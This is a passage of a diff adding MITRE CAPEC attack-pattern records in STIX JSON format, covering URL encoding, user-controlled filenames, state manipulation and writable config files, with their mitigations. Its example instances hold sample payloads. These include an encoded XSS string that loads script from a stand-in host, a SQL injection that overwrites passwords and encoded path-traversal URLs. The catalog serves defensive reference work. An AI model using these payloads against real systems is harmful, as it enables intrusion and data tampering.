"attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "modified": "2022-09-29T00:00:00.000Z", + "name": "URL Encoding", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Resource Consumption (Denial of Service)", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n URL Encodings in IceCast MP3 Server.\n The following type of encoded string has been known traverse directories against the IceCast MP3 server9:\n http://[targethost]:8000/somefile/%2E%2E/target.mp3\n or using\n \"/%25%25/\" instead of \"/../\".\n The control character \"..\" can be used by an adversary to escape the document root.See also: CVE-2001-0784", + "\n Cross-Site Scripting\n \n URL-Encoded attack:http://target/getdata.php?data=%3cscript%20src=%22http%3a%2f%2fwww.badplace.com%2fnasty.js%22%3e%3c%2fscript%3e\n \n HTML execution:\n [REF-495]\n ", + "\n SQL Injection\n \n Original database query in the example file - \"login.asp\":SQLQuery = \"SELECT preferences FROM logintable WHERE userid='\" & Request.QueryString(\"userid\") & \"' AND password='\" & Request.QueryString(\"password\") & \"';\"\n \n URL-encoded attack:http://target/login.asp?userid=bob%27%3b%20update%20logintable%20set%20passwd%3d%270wn3d%27%3b--%00\n \n Executed database query:SELECT preferences FROM logintable WHERE userid='bob'; update logintable set password='0wn3d';\n From \"URL encoded attacks\", by Gunter Ollmann - http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html\n ", + "\n Combined Encodings CesarFTP\n Alexandre Cesari released a freeware FTP server for Windows that fails to provide proper filtering against multiple encoding. The FTP server, CesarFTP, included a Web server component that could be attacked with a combination of the triple-dot and URL encoding attacks.\n An adversary could provide a URL that included a string like\n /...%5C/\n This is an interesting exploit because it involves an aggregation of several tricks: the escape character, URL encoding, and the triple dot.See also: CVE-2001-1335" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey web application for URLs with parameters: Using a browser, an automated tool or by inspecting the application, an adversary records all URLs that contain parameters.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.

Experiment

  1. Probe URLs to locate vulnerabilities: The adversary uses the URLs gathered in the \"Explore\" phase as a target list and tests parameters with different encodings of special characters to see how the web application will handle them.

    2. Techniques
    Use URL encodings of special characters such as semi-colons, backslashes, or question marks that might be filtered out normally.
    Combine the use of URL encodings with other encoding techniques such as the triple dot and escape slashes.

Exploit

  1. Inject special characters into URL parameters: Using the information gathered in the \"Experiment\" phase, the adversary injects special characters into the URL using URL encoding. This can lead to path traversal, cross-site scripting, SQL injection, etc.

", + "x_capec_extended_description": "\n A URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE).\n For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An adversary will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL.\n It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc. The adversary could also subvert the meaning of the URL string request by encoding the data being sent to the server through a GET request. For instance an adversary may subvert the meaning of parameters used in a SQL request and sent through the URL string (See Example section).\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The application should accepts and decodes URL input.", + "The application performs insufficient filtering/canonicalization on the URLs." + ], + "x_capec_skills_required": { + "Low": "An adversary can try special characters in the URL and bypass the URL validation.", + "Medium": "The adversary may write a script to defeat the input filtering mechanism." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--000e54be-d542-4ff3-9e55-2b5ce4b1023d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1f048925-3094-483c-abf2-c5efe689193a", + "spec_version": "2.1", + "target_ref": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1e04db14-a140-40e0-aafe-1ec097c9a4d2", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1890182c-6989-4e34-bfb2-92b223bcae0c", + "spec_version": "2.1", + "target_ref": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a27b504b-7f3c-47fb-ad70-9a9042fe74bd", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--24852297-758a-489f-b2c9-a27cbfbb938e", + "spec_version": "2.1", + "target_ref": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fece2ddc-b7fd-4f9e-a015-51a13642ef80", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3833d761-4a54-4ed3-994b-c7c76c465ae0", + "spec_version": "2.1", + "target_ref": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--506ec38c-6161-4411-b56b-cf20c5960c3c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--001320df-5e57-4ed3-bcf8-7e79dfe846aa", + "spec_version": "2.1", + "target_ref": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Be aware of the threat of alternative method of data encoding and obfuscation technique such as IP address encoding. (See related guideline section)", + "id": "course-of-action--11783efd-94f2-4741-93c8-e33b1de782b8", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-72-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2e586d60-d396-45aa-bfa2-afbd31a70dbb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--11783efd-94f2-4741-93c8-e33b1de782b8", + "spec_version": "2.1", + "target_ref": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--32ed5b33-4ffc-4a9a-b6bf-f389799a677b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--95ef6587-c787-4051-b664-b5e8ca753c20", + "spec_version": "2.1", + "target_ref": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attack of this type involves an adversary inserting malicious characters (such as a XSS redirection) into a filename, directly or indirectly that is then used by the target software to generate HTML text or other potentially executable content. Many websites rely on user-generated content and dynamically build resources like files, filenames, and URL links directly from user supplied data. In this attack pattern, the attacker uploads code that can execute in the client browser and/or redirect the client browser to a site that the attacker owns. All XSS attack payload variants can be used to pass and exploit these vulnerabilities.", + "external_references": [ + { + "external_id": "CAPEC-73", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/73.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-184", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html" + }, + { + "external_id": "CWE-96", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/96.html" + }, + { + "external_id": "CWE-348", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/348.html" + }, + { + "external_id": "CWE-116", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/116.html" + }, + { + "external_id": "CWE-350", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/350.html" + }, + { + "external_id": "CWE-86", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/86.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "modified": "2017-05-01T00:00:00.000Z", + "name": "User-Controlled Filename", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f" + ], + "x_capec_child_of_refs": [ + "attack-pattern--f8533ce1-5f23-4660-8f70-1a05af2c70d3" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Alter Execution Logic" + ], + "Confidentiality": [ + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Phishing attacks rely on a user clicking on links on that are supplied to them by attackers masquerading as a trusted resource such as a bank or online auction site. The end user's email client hosts the supplied resource name in this case via email. The resource name, however may either 1) direct the client browser to a malicious site to steal credentials and/or 2) execute code on the client machine to probe the victim's host system and network environment." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The victim must trust the name and locale of user controlled filenames." + ], + "x_capec_skills_required": { + "High": "Exploiting a client side vulnerability to inject malicious scripts into the browser's executable process.", + "Low": "To achieve a redirection and use of less trusted source, an attacker can simply edit data that the host uses to build the filename", + "Medium": "Deploying a malicious \"look-a-like\" site (such as a site masquerading as a bank or online auction site) that the user enters their authentication data into." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5a1e9288-e1cd-4661-bafa-f7a7f61e4a8c", + "modified": "2017-05-01T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "spec_version": "2.1", + "target_ref": "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d5da4f75-8c61-4081-b026-75f19ec8f8a1", + "modified": "2017-05-01T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9836d98-9116-4902-ba62-2c4fcc7e03c3", + "spec_version": "2.1", + "target_ref": "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--15e190ea-a35c-4658-b69e-402f5cec7ad9", + "modified": "2017-05-01T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "spec_version": "2.1", + "target_ref": "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bdccd87f-be5a-4567-acac-ded05ba22454", + "modified": "2017-05-01T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f20a4a7-cb6a-477b-a12a-13c5e9d03353", + "spec_version": "2.1", + "target_ref": "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--060fd8e7-cc86-47f8-b257-2e90a6935da9", + "modified": "2017-05-01T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f31f11cb-6403-4667-bf43-d77242ac7ae2", + "spec_version": "2.1", + "target_ref": "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Scan dynamically generated content against validation specification", + "id": "course-of-action--36312b31-f41b-4f9e-8a90-8f9bdabbaeec", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-73-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fbbc43fd-aa0e-44e4-98a4-ff409bf08afb", + "modified": "2017-05-01T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--36312b31-f41b-4f9e-8a90-8f9bdabbaeec", + "spec_version": "2.1", + "target_ref": "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n The adversary modifies state information maintained by the target software or causes a state transition in hardware. If successful, the target will use this tainted state and execute in an unintended manner.\n State management is an important function within a software application. User state maintained by the application can include usernames, payment information, browsing history as well as application-specific contents such as items in a shopping cart. Manipulating user state can be employed by an adversary to elevate privilege, conduct fraudulent transactions or otherwise modify the flow of the application to derive certain benefits.\n If there is a hardware logic error in a finite state machine, the adversary can use this to put the system in an undefined state which could cause a denial of service or exposure of secure data.\n ", + "external_references": [ + { + "external_id": "CAPEC-74", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-372", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/372.html" + }, + { + "external_id": "CWE-315", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/315.html" + }, + { + "external_id": "CWE-353", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/353.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "external_id": "CWE-1245", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1245.html" + }, + { + "external_id": "CWE-1253", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1253.html" + }, + { + "external_id": "CWE-1265", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1265.html" + }, + { + "external_id": "CWE-1271", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1271.html" + } + ], + "id": "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Manipulating State", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution" + ], + "Confidentiality": [ + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n During the authentication process, an application stores the authentication decision (auth=0/1) in unencrypted cookies. At every request, this cookie is checked to permit or deny a request.\n An adversary can easily violate this representation of user state and set auth=1 at every request in order to gain illegitimate access and elevated privilege in the application.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Adversary determines the nature of state management employed by the target. This includes determining the location (client-side, server-side or both applications) and possibly the items stored as part of user state.

Experiment

  1. The adversary now tries to modify the user state contents (possibly indiscriminately if the contents are encrypted or otherwise obfuscated) or cause a state transition and observe the effects of this change on the target.

Exploit

  1. Having determined how to manipulate the state, the adversary can perform illegitimate actions.

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--750dc5a2-e3c4-42d7-ad8a-25a7d1116f03", + "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681" + ], + "x_capec_prerequisites": [ + "User state is maintained at least in some way in user-controllable locations, such as cookies or URL parameters.", + "There is a faulty finite state machine in the hardware logic that can be exploited." + ], + "x_capec_resources_required": [ + "The adversary needs a data tampering tool capable of generating and creating custom inputs to aid in the attack, like Fiddler, Wireshark, or a similar in-browser plugin (e.g., Tamper Data for Firefox)." + ], + "x_capec_skills_required": { + "Medium": "The adversary needs to have knowledge of state management as employed by the target application, and also the ability to manipulate the state in a meaningful way." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not rely solely on user-controllable locations, such as cookies or URL parameters, to maintain user state.", + "id": "course-of-action--426e0345-2074-48c8-9a3d-b7f7550e3712", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-74-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--002041eb-05e7-4cd3-ba28-e881bb148370", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--426e0345-2074-48c8-9a3d-b7f7550e3712", + "spec_version": "2.1", + "target_ref": "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid sensitive information, such as usernames or authentication and authorization information, in user-controllable locations.", + "id": "course-of-action--ea5c5ff6-e6bb-4b4a-8c73-9aa87a9f9974", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-74-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d901ded9-6bd3-4d45-b338-71715e666e92", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ea5c5ff6-e6bb-4b4a-8c73-9aa87a9f9974", + "spec_version": "2.1", + "target_ref": "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Sensitive information that is part of the user state must be appropriately protected to ensure confidentiality and integrity at each request.", + "id": "course-of-action--3d2a63b7-8651-46d9-9b31-187b55061c36", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-74-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2eab1469-094c-46e2-b78f-9a9d3108e08b", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3d2a63b7-8651-46d9-9b31-187b55061c36", + "spec_version": "2.1", + "target_ref": "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "All possible states must be handled by hardware finite state machines.", + "id": "course-of-action--638372f7-a792-4269-acd6-cfb761391fd6", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-74-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0bde6497-61aa-43b6-b9ed-7a55f500f332", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--638372f7-a792-4269-acd6-cfb761391fd6", + "spec_version": "2.1", + "target_ref": "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Generally these are manually edited files that are not in the preview of the system administrators, any ability on the attackers' behalf to modify these files, for example in a CVS repository, gives unauthorized access directly to the application, the same as authorized users.", + "external_references": [ + { + "external_id": "CAPEC-75", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/75.html" + }, + { + "external_id": "CWE-349", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/349.html" + }, + { + "external_id": "CWE-99", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/99.html" + }, + { + "external_id": "CWE-77", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/77.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-353", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/353.html" + }, + { + "external_id": "CWE-354", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/354.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Manipulating Writeable Configuration Files", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f9f65fdd-5857-4a57-a725-066465397601" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The BEA Weblogic server uses a config.xml file to store configuration data. If this file is not properly protected by the system access control, an attacker can write configuration information to redirect server output through system logs, database connections, malicious URLs and so on. Access to the Weblogic server may be from a so-called Custom realm which manages authentication and authorization privileges on behalf of user principals. Given write access, the attacker can insert a pointer to a custom realm jar file in the config.xml\n < CustomRealmConfigurationData=\"java.util.Properties\"Name=\"CustomRealm\"RealmClassName=\"Maliciousrealm.jar\"/>\n \n The main issue with configuration files is that the attacker can leverage all the same functionality the server has, but for malicious means. Given the complexity of server configuration, these changes may be very hard for administrators to detect.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Configuration files must be modifiable by the attacker" + ], + "x_capec_skills_required": { + "Medium": "To identify vulnerable configuration files, and understand how to manipulate servers and erase forensic evidence" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--390b777d-a7f5-499e-b105-e88b8b537dc7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4112a44-a0f9-4bde-bebe-74ed96c4cd3f", + "spec_version": "2.1", + "target_ref": "attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Backup copies of all configuration files", + "id": "course-of-action--5f72dfc6-fc40-4c50-b43a-fb3f8613c890", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-75-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1b2f0cb4-7979-41a9-b066-52623efd9be1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5f72dfc6-fc40-4c50-b43a-fb3f8613c890", + "spec_version": "2.1", + "target_ref": 